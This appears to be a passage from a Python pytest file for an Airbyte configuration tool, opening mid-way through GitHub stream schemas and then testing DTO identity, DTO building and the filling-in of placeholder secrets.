'aliasName': 'issues', 'selected': True}}, {'stream': {'name': 'organizations', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'blog': {'type': ['null', 'string']}, 'name': {'type': ['null', 'string']}, 'plan': {'type': ['null', 'object'], 'properties': {'name': {'type': ['null', 'string']}, 'seats': {'type': ['null', 'integer']}, 'space': {'type': ['null', 'integer']}, 'filled_seats': {'type': ['null', 'integer']}, 'private_repos': {'type': ['null', 'integer']}}}, 'type': {'type': ['null', 'string']}, 'email': {'type': ['null', 'string']}, 'login': {'type': ['null', 'string']}, 'company': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'location': {'type': ['null', 'string']}, 'followers': {'type': ['null', 'integer']}, 'following': {'type': ['null', 'integer']}, 'hooks_url': {'type': ['null', 'string']}, 'repos_url': {'type': ['null', 'string']}, 'avatar_url': {'type': ['null', 'string']}, 'created_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'disk_usage': {'type': ['null', 'integer']}, 'events_url': {'type': ['null', 'string']}, 'issues_url': {'type': ['null', 'string']}, 'updated_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'description': {'type': ['null', 'string']}, 'is_verified': {'type': ['null', 'boolean']}, 'members_url': {'type': ['null', 'string']}, 'public_gists': {'type': ['null', 'integer']}, 'public_repos': {'type': ['null', 'integer']}, 'billing_email': {'type': ['null', 'string']}, 'collaborators': {'type': ['null', 'integer']}, 'private_gists': {'type': ['null', 'integer']}, 'twitter_username': {'type': ['null', 'string']}, 'public_members_url': {'type': ['null', 'string']}, 'owned_private_repos': {'type': ['null', 'integer']}, 'total_private_repos': {'type': ['null', 'integer']}, 'has_repository_projects': {'type': ['null', 'boolean']}, 'members_can_create_pages': {'type': ['null', 'boolean']}, 'has_organization_projects': {'type': ['null', 'boolean']}, 'default_repository_permission': {'type': ['null', 'string']}, 'two_factor_requirement_enabled': {'type': ['null', 'boolean']}, 'members_can_create_public_pages': {'type': ['null', 'boolean']}, 'members_can_create_repositories': {'type': ['null', 'boolean']}, 'members_can_create_private_pages': {'type': ['null', 'boolean']}}}, 'supportedSyncModes': ['full_refresh'], 'sourceDefinedCursor': None, 'defaultCursorField': [], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': [], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'organizations', 'selected': True}}, {'stream': {'name': 'projects', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'body': {'type': ['null', 'string']}, 'name': {'type': ['null', 'string']}, 'state': {'type': ['null', 'string']}, 'number': {'type': ['null', 'integer']}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'owner_url': {'type': ['null', 'string']}, 'created_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'creator_id': {'type': ['null', 'integer']}, 'repository': {'type': ['string']}, 'updated_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'columns_url': {'type': ['null', 'string']}}}, 'supportedSyncModes': ['full_refresh', 'incremental'], 'sourceDefinedCursor': True, 'defaultCursorField': ['updated_at'], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': ['updated_at'], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'projects', 'selected': True}}, {'stream': {'name': 'pull_request_stats', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'merged': {'type': ['null', 'boolean']}, 'number': {'type': ['null', 'integer']}, 'commits': {'type': ['null', 'integer']}, 'node_id': {'type': ['null', 'string']}, 'comments': {'type': ['null', 'integer']}, 'additions': {'type': ['null', 'integer']}, 'deletions': {'type': ['null', 'integer']}, 'mergeable': {'type': ['null', 'boolean']}, 'merged_by': {'type': ['null', 'object'], 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'type': {'type': ['null', 'string']}, 'login': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'gists_url': {'type': ['null', 'string']}, 'repos_url': {'type': ['null', 'string']}, 'avatar_url': {'type': ['null', 'string']}, 'events_url': {'type': ['null', 'string']}, 'site_admin': {'type': ['null', 'boolean']}, 'gravatar_id': {'type': ['null', 'string']}, 'starred_url': {'type': ['null', 'string']}, 'followers_url': {'type': ['null', 'string']}, 'following_url': {'type': ['null', 'string']}, 'organizations_url': {'type': ['null', 'string']}, 'subscriptions_url': {'type': ['null', 'string']}, 'received_events_url': {'type': ['null', 'string']}}}, 'rebaseable': {'type': ['null', 'boolean']}, 'repository': {'type': ['string']}, 'changed_files': {'type': ['null', 'integer']}, 'mergeable_state': {'type': ['null', 'string']}, 'review_comments': {'type': ['null', 'integer']}, 'maintainer_can_modify': {'type': ['null', 'boolean']}}}, 'supportedSyncModes': ['full_refresh'], 'sourceDefinedCursor': None, 'defaultCursorField': [], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': [], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'pull_request_stats', 'selected': True}}, {'stream': {'name': 'pull_requests', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'base': {'type': ['null', 'object'], 'properties': {'ref': {'type': ['null', 'string']}, 'sha': {'type': ['null', 'string']}, 'label': {'type': ['null', 'string']}, 'repo_id': {'type': ['null', 'integer']}, 'user_id': {'type': ['null', 'integer']}}}, 'body': {'type': ['null', 'string']}, 'head': {'type': ['null', 'object'], 'properties': {'ref': {'type': ['null', 'string']}, 'sha': {'type': ['null', 'string']}, 'label': {'type': ['null', 'string']}, 'repo_id': {'type': ['null', 'integer']}, 'user_id': {'type': ['null', 'integer']}}}, 'user': {'type': ['null', 'object'], 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'type': {'type': ['null', 'string']}, 'login': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'gists_url': {'type': ['null', 'string']}, 'repos_url': {'type': ['null', 'string']}, 'avatar_url': {'type': ['null', 'string']}, 'events_url': {'type': ['null', 'string']}, 'site_admin': {'type': ['null', 'boolean']}, 'gravatar_id': {'type': ['null', 'string']}, 'starred_url': {'type': ['null', 'string']}, 'followers_url': {'type': ['null', 'string']}, 'following_url': {'type': ['null', 'string']}, 'organizations_url': {'type': ['null', 'string']}, 'subscriptions_url': {'type': ['null', 'string']}, 'received_events_url': {'type': ['null', 'string']}}}, 'draft': {'type': ['null', 'boolean']}, 'state': {'type': ['null', 'string']}, 'title': {'type': ['null', 'string']}, '_links': {'type': ['null', 'object'], 'properties': {'html': {'type': ['null', 'object'], 'properties': {'href': {'type': ['null', 'string']}}}, 'self': {'type': ['null', 'object'], 'properties': {'href': {'type': ['null', 'string']}}}, 'issue': {'type': ['null', 'object'], 'properties': {'href': {'type': ['null', 'string']}}}, 'commits': {'type': ['null', 'object'], 'properties': {'href': {'type': ['null', 'string']}}}, 'comments': {'type': ['null', 'object'], 'properties': {'href': {'type': ['null', 'string']}}}, 'statuses': {'type': ['null', 'object'], 'properties': {'href': {'type': ['null', 'string']}}}, 'review_comment': {'type': ['null', 'object'], 'properties': {'href': {'type': ['null', 'string']}}}, 'review_comments': {'type': ['null', 'object'], 'properties': {'href': {'type': ['null', 'string']}}}}}, 'labels': {'type': ['null', 'array'], 'items': {'type': ['null', 'integer']}}, 'locked': {'type': ['null', 'boolean']}, 'number': {'type': ['null', 'integer']}, 'node_id': {'type': ['null', 'string']}, 'diff_url': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'assignees': {'type': ['null', 'array'], 'items': {'type': ['null', 'integer']}}, 'closed_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'issue_url': {'type': ['null', 'string']}, 'merged_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'patch_url': {'type': ['null', 'string']}, 'auto_merge': {'type': ['null', 'boolean']}, 'created_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'repository': {'type': ['string']}, 'updated_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'assignee_id': {'type': ['null', 'integer']}, 'commits_url': {'type': ['null', 'string']}, 'comments_url': {'type': ['null', 'string']}, 'milestone_id': {'type': ['null', 'integer']}, 'statuses_url': {'type': ['null', 'string']}, 'requested_teams': {'type': ['null', 'array'], 'items': {'type': ['null', 'integer']}}, 'merge_commit_sha': {'type': ['null', 'string']}, 'active_lock_reason': {'type': ['null', 'string']}, 'author_association': {'type': ['null', 'string']}, 'review_comment_url': {'type': ['null', 'string']}, 'requested_reviewers': {'type': ['null', 'array'], 'items': {'type': ['null', 'integer']}}, 'review_comments_url': {'type': ['null', 'string']}}}, 'supportedSyncModes': ['full_refresh', 'incremental'], 'sourceDefinedCursor': True, 'defaultCursorField': ['updated_at'], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': ['updated_at'], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'pull_requests', 'selected': True}}, {'stream': {'name': 'releases', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'body': {'type': ['null', 'string']}, 'name': {'type': ['null', 'string']}, 'draft': {'type': ['null', 'boolean']}, 'assets': {'type': ['null', 'array'], 'items': {'type': ['null', 'object'], 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'name': {'type': ['null', 'string']}, 'size': {'type': ['null', 'integer']}, 'label': {'type': ['null', 'string']}, 'state': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'created_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'updated_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'uploader_id': {'type': ['null', 'integer']}, 'content_type': {'type': ['null', 'string']}, 'download_count': {'type': ['null', 'integer']}, 'browser_download_url': {'type': ['null', 'string']}}}}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'tag_name': {'type': ['null', 'string']}, 'author_id': {'type': ['null', 'integer']}, 'assets_url': {'type': ['null', 'string']}, 'created_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'prerelease': {'type': ['null', 'boolean']}, 'repository': {'type': ['string']}, 'upload_url': {'type': ['null', 'string']}, 'tarball_url': {'type': ['null', 'string']}, 'zipball_url': {'type': ['null', 'string']}, 'published_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'target_commitish': {'type': ['null', 'string']}}}, 'supportedSyncModes': ['full_refresh', 'incremental'], 'sourceDefinedCursor': True, 'defaultCursorField': ['created_at'], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': ['created_at'], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'releases', 'selected': True}}, {'stream': {'name': 'repositories', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'fork': {'type': ['null', 'boolean']}, 'name': {'type': ['null', 'string']}, 'size': {'type': ['null', 'integer']}, 'owner': {'type': ['null', 'object'], 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'type': {'type': ['null', 'string']}, 'login': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'gists_url': {'type': ['null', 'string']}, 'repos_url': {'type': ['null', 'string']}, 'avatar_url': {'type': ['null', 'string']}, 'events_url': {'type': ['null', 'string']}, 'site_admin': {'type': ['null', 'boolean']}, 'gravatar_id': {'type': ['null', 'string']}, 'starred_url': {'type': ['null', 'string']}, 'followers_url': {'type': ['null', 'string']}, 'following_url': {'type': ['null', 'string']}, 'organizations_url': {'type': ['null', 'string']}, 'subscriptions_url': {'type': ['null', 'string']}, 'received_events_url': {'type': ['null', 'string']}}}, 'topics': {'type': ['null', 'array'], 'items': {'type': ['null', 'string']}}, 'git_url': {'type': ['null', 'string']}, 'license': {'type': ['null', 'object'], 'properties': {'key': {'type': ['null', 'string']}, 'url': {'type': ['null', 'string']}, 'name': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'spdx_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}}}, 'node_id': {'type': ['null', 'string']}, 'private': {'type': ['null', 'boolean']}, 'ssh_url': {'type': ['null', 'string']}, 'svn_url': {'type': ['null', 'string']}, 'archived': {'type': ['null', 'boolean']}, 'disabled': {'type': ['null', 'boolean']}, 'has_wiki': {'type': ['null', 'boolean']}, 'homepage': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'keys_url': {'type': ['null', 'string']}, 'language': {'type': ['null', 'string']}, 'tags_url': {'type': ['null', 'string']}, 'blobs_url': {'type': ['null', 'string']}, 'clone_url': {'type': ['null', 'string']}, 'forks_url': {'type': ['null', 'string']}, 'full_name': {'type': ['null', 'string']}, 'has_pages': {'type': ['null', 'boolean']}, 'hooks_url': {'type': ['null', 'string']}, 'pulls_url': {'type': ['null', 'string']}, 'pushed_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'teams_url': {'type': ['null', 'string']}, 'trees_url': {'type': ['null', 'string']}, 'created_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'events_url': {'type': ['null', 'string']}, 'has_issues': {'type': ['null', 'boolean']}, 'issues_url': {'type': ['null', 'string']}, 'labels_url': {'type': ['null', 'string']}, 'merges_url': {'type': ['null', 'string']}, 'mirror_url': {'type': ['null', 'string']}, 'updated_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'visibility': {'type': ['null', 'string']}, 'archive_url': {'type': ['null', 'string']}, 'commits_url': {'type': ['null', 'string']}, 'compare_url': {'type': ['null', 'string']}, 'description': {'type': ['null', 'string']}, 'forks_count': {'type': ['null', 'integer']}, 'is_template': {'type': ['null', 'boolean']}, 'permissions': {'type': ['null', 'object'], 'properties': {'pull': {'type': ['null', 'boolean']}, 'push': {'type': ['null', 'boolean']}, 'admin': {'type': ['null', 'boolean']}}}, 'branches_url': {'type': ['null', 'string']}, 'comments_url': {'type': ['null', 'string']}, 'contents_url': {'type': ['null', 'string']}, 'git_refs_url': {'type': ['null', 'string']}, 'git_tags_url': {'type': ['null', 'string']}, 'has_projects': {'type': ['null', 'boolean']}, 'releases_url': {'type': ['null', 'string']}, 'statuses_url': {'type': ['null', 'string']}, 'assignees_url': {'type': ['null', 'string']}, 'downloads_url': {'type': ['null', 'string']}, 'has_downloads': {'type': ['null', 'boolean']}, 'languages_url': {'type': ['null', 'string']}, 'default_branch': {'type': ['null', 'string']}, 'milestones_url': {'type': ['null', 'string']}, 'stargazers_url': {'type': ['null', 'string']}, 'watchers_count': {'type': ['null', 'integer']}, 'deployments_url': {'type': ['null', 'string']}, 'git_commits_url': {'type': ['null', 'string']}, 'subscribers_url': {'type': ['null', 'string']}, 'contributors_url': {'type': ['null', 'string']}, 'issue_events_url': {'type': ['null', 'string']}, 'stargazers_count': {'type': ['null', 'integer']}, 'subscription_url': {'type': ['null', 'string']}, 'collaborators_url': {'type': ['null', 'string']}, 'issue_comment_url': {'type': ['null', 'string']}, 'notifications_url': {'type': ['null', 'string']}, 'open_issues_count': {'type': ['null', 'integer']}}}, 'supportedSyncModes': ['full_refresh'], 'sourceDefinedCursor': None, 'defaultCursorField': [], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': [], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'repositories', 'selected': True}}, {'stream': {'name': 'review_comments', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'body': {'type': ['null', 'string']}, 'line': {'type': ['null', 'integer']}, 'path': {'type': ['null', 'string']}, 'side': {'type': ['null', 'string']}, 'user': {'type': ['null', 'object'], 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'type': {'type': ['null', 'string']}, 'login': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'gists_url': {'type': ['null', 'string']}, 'repos_url': {'type': ['null', 'string']}, 'avatar_url': {'type': ['null', 'string']}, 'events_url': {'type': ['null', 'string']}, 'site_admin': {'type': ['null', 'boolean']}, 'gravatar_id': {'type': ['null', 'string']}, 'starred_url': {'type': ['null', 'string']}, 'followers_url': {'type': ['null', 'string']}, 'following_url': {'type': ['null', 'string']}, 'organizations_url': {'type': ['null', 'string']}, 'subscriptions_url': {'type': ['null', 'string']}, 'received_events_url': {'type': ['null', 'string']}}}, '_links': {'type': ['null', 'object'], 'properties': {'html': {'type': ['null', 'object'], 'properties': {'href': {'type': ['null', 'string']}}}, 'self': {'type': ['null', 'object'], 'properties': {'href': {'type': ['null', 'string']}}}, 'pull_request': {'type': ['null', 'object'], 'properties': {'href': {'type': ['null', 'string']}}}}}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'position': {'type': ['null', 'integer']}, 'commit_id': {'type': ['null', 'string']}, 'diff_hunk': {'type': ['null', 'string']}, 'created_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'repository': {'type': ['string']}, 'start_line': {'type': ['null', 'integer']}, 'start_side': {'type': ['null', 'string']}, 'updated_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'original_line': {'type': ['null', 'integer']}, 'in_reply_to_id': {'type': ['null', 'integer']}, 'pull_request_url': {'type': ['null', 'string']}, 'original_position': {'type': ['null', 'integer']}, 'author_association': {'type': ['null', 'string']}, 'original_commit_id': {'type': ['null', 'string']}, 'original_start_line': {'type': ['null', 'integer']}, 'pull_request_review_id': {'type': ['null', 'integer']}}}, 'supportedSyncModes': ['full_refresh', 'incremental'], 'sourceDefinedCursor': True, 'defaultCursorField': ['updated_at'], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': ['updated_at'], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'review_comments', 'selected': True}}, {'stream': {'name': 'reviews', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'body': {'type': ['null', 'string']}, 'user': {'type': ['null', 'object'], 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'type': {'type': ['null', 'string']}, 'login': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'gists_url': {'type': ['null', 'string']}, 'repos_url': {'type': ['null', 'string']}, 'avatar_url': {'type': ['null', 'string']}, 'events_url': {'type': ['null', 'string']}, 'site_admin': {'type': ['null', 'boolean']}, 'gravatar_id': {'type': ['null', 'string']}, 'starred_url': {'type': ['null', 'string']}, 'followers_url': {'type': ['null', 'string']}, 'following_url': {'type': ['null', 'string']}, 'organizations_url': {'type': ['null', 'string']}, 'subscriptions_url': {'type': ['null', 'string']}, 'received_events_url': {'type': ['null', 'string']}}}, 'state': {'type': ['null', 'string']}, '_links': {'type': ['null', 'object'], 'properties': {'html': {'type': ['null', 'object'], 'properties': {'href': {'type': ['null', 'string']}}}, 'pull_request': {'type': ['null', 'object'], 'properties': {'href': {'type': ['null', 'string']}}}}}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'commit_id': {'type': ['null', 'string']}, 'repository': {'type': ['string']}, 'submitted_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'pull_request_url': {'type': ['null', 'string']}, 'author_association': {'type': ['null', 'string']}}}, 'supportedSyncModes': ['full_refresh'], 'sourceDefinedCursor': None, 'defaultCursorField': [], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': [], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'reviews', 'selected': True}}, {'stream': {'name': 'stargazers', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'user': {'type': ['null', 'object'], 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'type': {'type': ['null', 'string']}, 'login': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'gists_url': {'type': ['null', 'string']}, 'repos_url': {'type': ['null', 'string']}, 'avatar_url': {'type': ['null', 'string']}, 'events_url': {'type': ['null', 'string']}, 'site_admin': {'type': ['null', 'boolean']}, 'gravatar_id': {'type': ['null', 'string']}, 'starred_url': {'type': ['null', 'string']}, 'followers_url': {'type': ['null', 'string']}, 'following_url': {'type': ['null', 'string']}, 'organizations_url': {'type': ['null', 'string']}, 'subscriptions_url': {'type': ['null', 'string']}, 'received_events_url': {'type': ['null', 'string']}}}, 'user_id': {'type': ['null', 'integer']}, 'repository': {'type': ['string']}, 'starred_at': {'type': ['null', 'string'], 'format': 'date-time'}}}, 'supportedSyncModes': ['full_refresh', 'incremental'], 'sourceDefinedCursor': True, 'defaultCursorField': ['starred_at'], 'sourceDefinedPrimaryKey': [['user_id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': ['starred_at'], 'destinationSyncMode': 'append', 'primaryKey': [['user_id']], 'aliasName': 'stargazers', 'selected': True}}, {'stream': {'name': 'tags', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'name': {'type': ['null', 'string']}, 'commit': {'type': ['null', 'object'], 'properties': {'sha': {'type': ['null', 'string']}, 'url': {'type': ['null', 'string']}}}, 'node_id': {'type': ['null', 'string']}, 'repository': {'type': ['string']}, 'tarball_url': {'type': ['null', 'string']}, 'zipball_url': {'type': ['null', 'string']}}}, 'supportedSyncModes': ['full_refresh'], 'sourceDefinedCursor': None, 'defaultCursorField': [], 'sourceDefinedPrimaryKey': [], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': [], 'destinationSyncMode': 'append', 'primaryKey': [], 'aliasName': 'tags', 'selected': True}}, {'stream': {'name': 'teams', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'name': {'type': ['null', 'string']}, 'slug': {'type': ['null', 'string']}, 'parent': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'privacy': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'permission': {'type': ['null', 'string']}, 'repository': {'type': ['null', 'string']}, 'description': {'type': ['null', 'string']}, 'members_url': {'type': ['null', 'string']}, 'organization': {'type': ['null', 'string']}, 'repositories_url': {'type': ['null', 'string']}}}, 'supportedSyncModes': ['full_refresh'], 'sourceDefinedCursor': None, 'defaultCursorField': [], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': [], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'teams', 'selected': True}}, {'stream': {'name': 'users', 'jsonSchema': {'type': ['null', 'object'], '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'type': {'type': ['null', 'string']}, 'login': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'gists_url': {'type': ['null', 'string']}, 'repos_url': {'type': ['null', 'string']}, 'avatar_url': {'type': ['null', 'string']}, 'events_url': {'type': ['null', 'string']}, 'site_admin': {'type': ['null', 'boolean']}, 'gravatar_id': {'type': ['null', 'string']}, 'starred_url': {'type': ['null', 'string']}, 'organization': {'type': ['null', 'string']}, 'followers_url': {'type': ['null', 'string']}, 'following_url': {'type': ['null', 'string']}, 'organizations_url': {'type': ['null', 'string']}, 'subscriptions_url': {'type': ['null', 'string']}, 'received_events_url': {'type': ['null', 'string']}}}, 'supportedSyncModes': ['full_refresh'], 'sourceDefinedCursor': None, 'defaultCursorField': [], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': [], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'users', 'selected': True}}]}
def test_dto__get_identity(dummy_source_dto, dummy_destination_dto, dummy_connection_dto):
assert dummy_source_dto.get_identity()[0] == dummy_source_dto.source_id
assert dummy_source_dto.get_identity()[1] == dummy_source_dto.name
assert dummy_destination_dto.get_identity()[0] == dummy_destination_dto.destination_id
assert dummy_destination_dto.get_identity()[1] == dummy_destination_dto.name
assert dummy_connection_dto.get_identity()[0] == dummy_connection_dto.connection_id
assert dummy_connection_dto.get_identity()[1] == dummy_connection_dto.name
dummy_source_dto.source_id = None
dummy_destination_dto.destination_id = None
dummy_connection_dto.connection_id = None
assert dummy_source_dto.get_identity()[0] is None
assert dummy_destination_dto.get_identity()[0] is None
assert dummy_connection_dto.get_identity()[0] is None
def test_dto_factory__build_source_dto(dummy_airbyte_dto_factory, dummy_source_dict, dummy_source_dto):
"""
Test AirbyteDtoFactory.build_source_dto
"""
t = dummy_airbyte_dto_factory.build_source_dto(dummy_source_dict)
assert t.source_definition_id == dummy_source_dto.source_definition_id
assert t.source_id == dummy_source_dto.source_id
assert t.workspace_id == dummy_source_dto.workspace_id
assert t.connection_configuration == dummy_source_dto.connection_configuration
assert t.source_name == dummy_source_dto.source_name
assert t.name == dummy_source_dto.name
assert t.tags == dummy_source_dto.tags
def test_dto_factory__build_destination_dto(dummy_airbyte_dto_factory, dummy_destination_dict, dummy_destination_dto):
"""
Test AirbyteDtoFactory.build_destination_dto
"""
t = dummy_airbyte_dto_factory.build_destination_dto(dummy_destination_dict)
assert t.destination_definition_id == dummy_destination_dto.destination_definition_id
assert t.destination_id == dummy_destination_dto.destination_id
assert t.workspace_id == dummy_destination_dto.workspace_id
assert t.connection_configuration == dummy_destination_dto.connection_configuration
assert t.destination_name == dummy_destination_dto.destination_name
assert t.name == dummy_destination_dto.name
assert t.tags == dummy_destination_dto.tags
def test_dto_factory__build_connection_dto__existing_connection(dummy_airbyte_dto_factory, dummy_existing_connection_dict,
dummy_connection_dto):
"""
Test AirbyteDtoFactory.build_connection_dto using a dict for an existing connection
Ensures that the ConnectionDto being built by the AirbyteDtoFactory is faithful to the input dict
"""
t = dummy_airbyte_dto_factory.build_connection_dto(dummy_existing_connection_dict)
assert t.connection_id == dummy_connection_dto.connection_id
assert t.source_id == dummy_connection_dto.source_id
assert t.destination_id == dummy_connection_dto.destination_id
assert t.name == dummy_connection_dto.name
assert t.prefix == dummy_connection_dto.prefix
assert t.schedule == dummy_connection_dto.schedule
assert t.status == dummy_connection_dto.status
assert t.sync_catalog == dummy_connection_dto.sync_catalog
def test_dto_factory__build_connection_dto__new_connection(dummy_airbyte_dto_factory, dummy_new_connection_dict,
dummy_connection_dto):
"""
Test AirbyteDtoFactory.build_connection_dto using a dict for an existing connection
Ensures that the ConnectionDto being built by the AirbyteDtoFactory is faithful to the input dict
"""
t = dummy_airbyte_dto_factory.build_connection_dto(dummy_new_connection_dict)
assert t.source_name == dummy_connection_dto.source_name
assert t.destination_name == dummy_connection_dto.destination_name
assert t.name == dummy_connection_dto.name
assert t.prefix == dummy_connection_dto.prefix
assert t.schedule == dummy_connection_dto.schedule
assert t.status == dummy_connection_dto.status
def test_dto_factory__build_connection_group_dto(dummy_airbyte_dto_factory, dummy_connection_group_dict,
dummy_connection_group_dto):
"""
Test AirbyteDtoFactory.build_connection_group_dto
Experimental
"""
t = dummy_airbyte_dto_factory.build_connection_group_dto(dummy_connection_group_dict)
assert t.group_name == dummy_connection_group_dto.group_name
assert t.source_tags == dummy_connection_group_dto.source_tags
assert t.destination_tags == dummy_connection_group_dto.destination_tags
assert t.prefix == dummy_connection_group_dto.prefix
assert t.schedule == dummy_connection_group_dto.schedule
assert t.status == dummy_connection_group_dto.status
assert t.sync_catalog == dummy_connection_group_dto.sync_catalog
def test_dto_factory__populate_secrets(dummy_airbyte_dto_factory, dummy_secrets_dict, dummy_source_dto,
dummy_destination_dto):
"""
Test AirbyteDtoFactory.populate_secrets
Verifies placeholder secrets in the DTOs are being correctly overridden
"""
new_dtos = {'sources': [dummy_source_dto], 'destinations': [dummy_destination_dto]}
dummy_airbyte_dto_factory.populate_secrets(dummy_secrets_dict, new_dtos)
assert new_dtos['sources'][0].connection_configuration['access_token'] == 'ghp_SECRET_TOKEN'
